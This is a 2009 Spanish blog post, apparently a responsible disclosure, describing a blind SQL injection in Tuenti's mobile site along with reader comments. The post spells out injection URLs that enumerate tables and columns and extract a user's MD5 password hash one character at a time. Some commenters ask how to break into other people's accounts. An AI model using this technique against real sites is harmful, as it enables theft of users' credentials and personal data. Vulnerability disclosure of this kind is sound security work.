« Tuenti Plus fake
Nuevo fake de TuentiPlus »

Fallo de seguridad en Tuenti: SQL Injection que permite obtener datos de usuarios

Son numerosos los fallos que se han ido detectando en esta red social (no más de los que se encuentras en cualquier otra web del estilo). Normalmente son fallos de XSS pero esta vez he encontrado en la web de Tuenti la posibilidad de inyectar código SQL.

Este enorme fallo de seguridad permite extraer datos confidenciales de usuarios (nombre, apellidos, mail, tfno, password en MD5, …) de manera que voy a escribir a los técnicos de Tuenti y a esperar que esté todo solucionado antes de publicarlo en el blog.

… Ya he hablado con Ícaro Moyano, por cierto, una persona muy agradable, y han solucionado el problema … paso a comentarlo …

En todas las páginas que he visto se filtran los parámetros para evitar la introducción de SQL, pero he encontrado de casualidad un parámetro que no se verifica, y con el que se puede inyectar información. Es en la web móvil y el ataque se basa en el método true/false (blind SQL), es decir, se altera la sentencia SQL de forma que si se muestra la página quiere decir que se cumple la función escrita y si da error o no se muestra, quiere decir que no se cumple. Por ejemplo:

http://m.tuenti.com/?m=profile&func=reply_to_wall_post&user_id=XXXXXXXX+and+1=1&post_id=XXXXXXXX

el parámetro user_id es vulnerable ya que no verifica que sea el ID del usuario y puedo añadir código SQL detrás. En este caso he incluido una función lógica que siempre se cumple: AND 1=1 y por tanto me muestra la web sin problemas

http://m.tuenti.com/?m=profile&func=reply_to_wall_post&user_id=XXXXXXXX+and+1=0&post_id=XXXXXXXX

en este otro caso puse una condición que nunca se cumple, por tanto la web da error: AND 1=0

Mediante esto es posible extraer información, por ejemplo:

http://m.tuenti.com/?m=profile&func=reply_to_wall_post&user_id=XXXXXXXX+and+(select+count(*)+from+tabla_user)>0&post_id=XXXXXXXX

al no darme error, deduzco que existe una tabla llamada tabla_user. Del mismo modo puedo averiguar el nombre de las columnas:

http://m.tuenti.com/?m=profile&func=reply_to_wall_post&user_id=XXXXXXXX+and+
(select+count(iduser)+from+tabla_user)>0&post_id=XXXXXXXX

http://m.tuenti.com/?m=profile&func=reply_to_wall_post&user_id=XXXXXXXX+and+
(select+count(mailuser)+from+tabla_user)>0&post_id=XXXXXXXX

http://m.tuenti.com/?m= profile&func=reply_to_wall_post&user_id=XXXXXXXX+and+
(select+count(nombreuser)+from+tabla_user)>0&post_id=XXXXXXXX
…..

Y una vez conocida la estructura de la tabla de usuarios puedo ir extrayendo los datos con un poco de paciencia (o con un pequeño script):

http://m.tuenti.com/?m=profile&func=reply_to_wall_post&user_id=XXXXXXXX+and+
(select+count(*)+from+tabla_user+where+iduser=XXXXXXXX+and+
substring(pwduser,1,1)>0×35)>0&post_id=XXXXXXXX

poco a poco puedo ir sacando cada uno de los caracteres que forman la contraseña de un usuario (en MD5), que luego, si no es una contraseña larga, es posible crackear en cuestión de poco tiempo. Sólo se trata de tener un poco de paciencia e ir sacando caracter a caracter hasta dar con los 32 que forman la contraseña … o implementar un pequeño script que en unos segundos te facilita los 32 caracteres de la contraseña en MD5.

NOTA: he cambiado los nombres de la tabla y columnas por otros inventados para no facilitar datos sensibles de Tuenti.

Tags: , ,

Esta entrada fué escrita el Martes 4 Agosto 2009 a las 13:49, en la categoría de Tuenti. Puedes seguir las respuestas de esta entrada a través de RSS 2.0. Respuestas no están actualmente permitidas, pero puedes trackback desde tu página web.

15 respuestas a “Fallo de seguridad en Tuenti: SQL Injection que permite obtener datos de usuarios”

  1. Tuenti tiene un fallo que permite sacar datos privados | TuentiAdictos.ES dice:
    11 Agosto, 2009 a las 22:20

    [...] la explicación que en su día dió Pepelux, si le añades al número de usuario código SQL, la página web se cargará si cumple la [...]

  2. anonimo dice:
    12 Agosto, 2009 a las 19:20

    igual te crees qeu has descuvierto tu esta vul… no? era ya concida por mucha gente, asi que no te hagas el hacker

  3. joserra dice:
    17 Agosto, 2009 a las 6:23

    Solo os quiero comentar una cosa que me dio por probar y fue algo bastante extraño,igual lo mencionais aqui y no me di cuenta,no llevo mucho tiempo en esto del”hack” la cosa es que decidi escribir esto en la barra de direcciones:
    http://m.tuenti.com/?m=profile&func=reply_to_wall_post&user_id=XXXXXXXX+and+1=1&post_id=XXXXXXXX

    que lo mencionais arriba(logicamente sustitui los XXX por numeros)la primera secuencia de XXX por el numero de usuario y la segunda puse un numero al azar,en mi caso el 54,y asi sin mas me salio un archivo m_tuenti_com para guardarle,le guarde y le abri con el bloc de notas,y aparece esto:

    Tuenti-EntrarEntrarE-mailContraseña Recordarme en este terminalRecordar contraseñaMás informaciónInicioAviso legal© 2009 Tuenti | Versión completa

    que es,se puede hacer algo con eso?

  4. Tania Vázquez dice:
    18 Agosto, 2009 a las 0:52

    Hola, me han robado mi contraseña y la han cambiado…
    he leido esto muchas veces pero no soy capaz de hacerme con la contraseña para poder recuperar mi tuenti….pepelux…tu podrias utilizar esto para devolverme la contraseña?

  5. Pepelux dice:
    28 Agosto, 2009 a las 13:27

    Amigo anónimo.

    Estoy totalmente seguro de que antes de que yo me percartara de esa vulnerabilidad ya había mucho carroñero como tú robando datos. El que la descubriera no quiere decir que haya sido el primero, sino que la descubrí por mí mismo y no me la dijo nadie. Del mismo modo se que a tí te la habrá dicho a tí otro lamercillo como tú y no habrás sido tu el que la descubrió, porque alguien que no sabe apenas escribir, cómo va a controlar de SQL?

  6. maria dice:
    17 Septiembre, 2009 a las 12:35

    buenas antes de nada felicitarte por tu pagina y por tus post me han servido de mucho pero tengo un pequeño problema, a parte que no tengo mucha idea me han robado mi cuenta de tuenti y he leido por post que utilizando el wfuzz o cain y abel puedo sacar la contraseña que ha puesto el …………… que me la ha robado es cierto??????. En caso de que no me puedes decir algun programa que sea capaz de decirme la contraseña y recuperar mis fotos y demas.

    muchas gracias eres un crack.

  7. fran dice:
    25 Septiembre, 2009 a las 0:04

    Como se hace esto exactamente?? cuando pego los enlacen con el numero de usuario me sale para descargarme un archivo k no se cn que programa se abre. podria explicarmelo. muxisimas gracias

  8. Pepelux dice:
    25 Septiembre, 2009 a las 0:34

    ya no se puede … está solucionado el bug

  9. Daniel dice:
    15 Octubre, 2009 a las 20:34

    No me he enterado de nada…. si alguien me puede decir como coger la contraseña a un tuenti, se lo agradeceria. :D

  10. k0rde dice:
    31 Octubre, 2009 a las 2:56

    Hace tiempo que no me doy una vuelta por la red, no porque no quiera sino por motivos personales, es complejo y me llama mucho la atención como juntando tuenti + usuario + fallo + robo de contraseñas… la gente se anima a comentar y ademas comentar estupideces. Seguramente tu Jose lo hayas notado más, si llevas un control de visita te aumentarian jeje. Pero a lo que vamos es interesantisimo y más aun la actitud de no publicar nada asta el reporte con tuenti (que de echo todo el equipo de trabajo es impresionante y grandes profesionales que se preocupan por arreglar este tipo de fallos y no te mandan a la mierda y luego lo solucionan como si lo hubieran localizado ellos).

    Nose si el bug alguien lo encontro antes o no cosa que pongo en duda esto va para el señor anonimo. Porque si fuera asi el bom que pegaría en la red se notaría.

    Nada simplemente un trabajo impresionante. Toda esta parrafada de mierda!jeje se remite en una palabra FELICIDADES!

  11. Pepelux dice:
    31 Octubre, 2009 a las 13:15

    Hola k0rde. Supongo que sí que habría gente aprovechándose de ese fallo antes de que yo lo viera. No es nada del otro mundo a pesar de que algunos se sientan superhackers porque un amigo se lo dijo y ellos sacan los datos de su vecina … sólo es cuestión de navegar, probar unas cuantas cosas y echarle tiempo.

    El caso es que efectivamente la gente de tuenti me ha demostrado ser muy profesional y abierta, pues no sería el primer fallo que reporto a un admin y este me dice con chulería que ellos no tienen ningún fallo y que me vaya un poco a la mierda.

    Un saludo :)

  12. javier dice:
    5 Noviembre, 2009 a las 14:49

    Hola a todos, os escribo para deciros q en este momento existe un fallo en el tuenti ya q a un amigo se le ha metio la novia de otro en su tuenti xa ver los privados q se mandan, prueba de ello esq ella le ha enviado un correo con todos los privados comprometedores q tenia en comun con su amigo. esto se hizo ace 2 semanas x lo tanto es posible y me gustaria saber como lo ha exo para q mi amigo le pueda devolver la jugada. ALGUIEN SABE COMO HACERLO???

    saludos

  13. josemi dice:
    22 Noviembre, 2009 a las 16:57

    HHola a todos y pepelux, a ver tuenti creo que a capado la aplicacion de tuenti plus v13, mirarlo xq lanza un mensaje que dice que tuenti detecto un problema y no se puede entrar a traves de la interfax, mirar a ver que os dice a vosotros y comentar algo, ok? un saludo

  14. Noveria Blog - Diario digital dice:
    12 Diciembre, 2009 a las 15:23

    [...] la última en el sistema para móviles publicado por Jose Luis y donde adjunta a su noticia un advisorie de su [...]

  15. Pepelux dice:
    29 Diciembre, 2009 a las 22:04

    Hola a todos. He cambiado el blog de sitio y para poder postear teneis que ir a http://blog.pepelux.org

    Un saludo